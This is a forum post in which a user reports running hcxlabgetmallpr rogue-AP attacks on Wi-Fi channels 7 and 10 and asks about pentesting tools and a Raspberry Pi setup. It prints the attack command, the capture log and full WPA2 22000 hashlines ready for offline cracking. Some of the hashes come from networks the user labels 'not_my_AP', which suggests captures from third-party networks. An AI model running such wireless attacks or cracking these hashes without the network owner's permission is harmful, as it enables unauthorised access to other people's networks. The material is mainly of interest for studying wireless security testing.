01-18-2023, 02:37 PM
Done testing with labtools. My channels are 7 and 10, scanning around 10 minutes.
Output
Are results from labtool scan are more informative compare to previous hcxdumptool scan?
I'm curious about system-1 and system-2. I use Raspberry Pi for Mac Time machine and torrent files, but keen to built another one for pentesting. Are system-1/2 "open source" or strictly private projects?
Code:
sudo hcxlabgetmallpr --onsigterm=exit --essidlist=essid --essidmax=100 --m2attempt=10 -c 7,10
dce99422f2a4 e89f805a386f 2457 10 M1M2ROGUE
dce99422f2a4 e89f805a386f 2457 10 M1M2
dce99422f2a4 e89f805a386f 2457 10 M1M2M3
dce99422f2a4 e89f805a386f 2457 10 M1M2M3M4
784b872bf63e 000c53051f36 2457 10 M1M2ROGUE
784b872bf63e 000c53051f36 2457 10 M1M2ROGUE
784b872bf63e e89f805a386f 2457 10 M1M2ROGUE
def15903154e e89f805a386f 2457 10 PMKID
ac89955fc775 000c53051f3a 2442 7 M1M2ROGUE
ac89955fc775 000c53051f3a 2442 7 M1M2ROGUE
ac89955fc775 000c53051f3a 2442 7 M1M2ROGUE
ac89955fc775 000c53051f3a 2457 10 M1M2ROGUE
ac89955fc775 000c53051f3a 2442 7 M1M2ROGUE
ac89955fc775 000c53051f3a 2442 7 M1M2ROGUE
ac89955fc775 000c53051f3a 2457 10 M1M2ROGUE
ac89955fc775 000c53051f3a 2457 10 M1M2ROGUE
ac89955fc775 000c53051f3a 2442 7 M1M2ROGUE
ac89955fc775 000c53051f3a 2457 10 M1M2ROGUE
04d4c48b1cf5 e89f805a386f 2457 10 M1M2ROGUE
32f725b62de3 000c53051f45 2457 10 M1M2ROGUE
^C
terminated loopCode:
hcxhashtool --info=stdout -i test.22000
SSID.......: my_AP
MAC_AP.....: 000c53051f36 (Unknown)
MAC_CLIENT.: 784b872bf63e (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 6b8b0a366b41e92d0c54414c9c0e0612
HASHLINE...: WPA*02*6b8b0a366b41e92d0c54414c9c0e0612*000c53051f36*784b872bf63e*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f06395f3857f4a195a3114790e6cda01427767eae879969c418a644bc7bb8dcaabfd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
SSID.......: not_my_AP-1
MAC_AP.....: 000c53051f3a (Unknown)
MAC_CLIENT.: ac89955fc775 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: d94c4df3e85351a6be18d12d3223c579
HASHLINE...: WPA*02*d94c4df3e85351a6be18d12d3223c579*000c53051f3a*ac89955fc775*e5878ce5b9b3e381ae6950686f6e65*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f0634141d1fa8b4688e4edb7d372cd8e164cb8deb67da987a26aa40233c2073e6388000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
SSID.......: not_my_AP-2
MAC_AP.....: 000c53051f45 (Unknown)
MAC_CLIENT.: 32f725b62de3 (Unknown)
VERSION....: 802.1X-2004 (2)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: fc29186d21463a5196aec3d7c5679550
HASHLINE...: WPA*02*fc29186d21463a5196aec3d7c5679550*000c53051f45*32f725b62de3*686f70686f7030373135*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0203007502010a0010000000000000f063500bafcd657f86d0efbfe8f42fdfe1867b821d1b1a9bd5cdad59b070fbdd9f92000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*10
SSID.......: my_AP
MAC_AP.....: e89f805a386f (Unknown)
MAC_CLIENT.: 04d4c48b1cf5 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: b606a3cb8dc3c9a48789266741a3b04b
HASHLINE...: WPA*02*b606a3cb8dc3c9a48789266741a3b04b*e89f805a386f*04d4c48b1cf5*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f06331f2c9d819a29528d508f19923ec29ef32c7547b9f10415c5bf891a8f07e405a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
SSID.......: my_AP
MAC_AP.....: e89f805a386f (Unknown)
MAC_CLIENT.: 784b872bf63e (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 6b8b0a366b41e92d0c54414c9c0e0612
HASHLINE...: WPA*02*6b8b0a366b41e92d0c54414c9c0e0612*e89f805a386f*784b872bf63e*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f06395f3857f4a195a3114790e6cda01427767eae879969c418a644bc7bb8dcaabfd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020000*10
SSID.......: my_AP
MAC_AP.....: e89f805a386f (Unknown)
MAC_CLIENT.: dce99422f2a4 (Unknown)
VERSION....: 802.1X-2001 (1)
KEY VERSION: WPA2
REPLAYCOUNT: 61539
RC INFO....: ROGUE attack / NC not required
MP M1M2 E2.: challenge
MIC........: 4e7012bb82bc533273f1c1e9362cce97
HASHLINE...: WPA*02*4e7012bb82bc533273f1c1e9362cce97*e89f805a386f*dce99422f2a4*41534b3838*8040afc11030361417a6d73c40c5fdaf250e2ed8a61515aac317ec5815c38711*0103007502010a0000000000000000f063dfdb4ee40d3bad7b1e7bb9e4ae2127a39fca62b360c6a011c458f3b73d1c0c9a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020c00*10Are results from labtool scan are more informative compare to previous hcxdumptool scan?
I'm curious about system-1 and system-2. I use Raspberry Pi for Mac Time machine and torrent files, but keen to built another one for pentesting. Are system-1/2 "open source" or strictly private projects?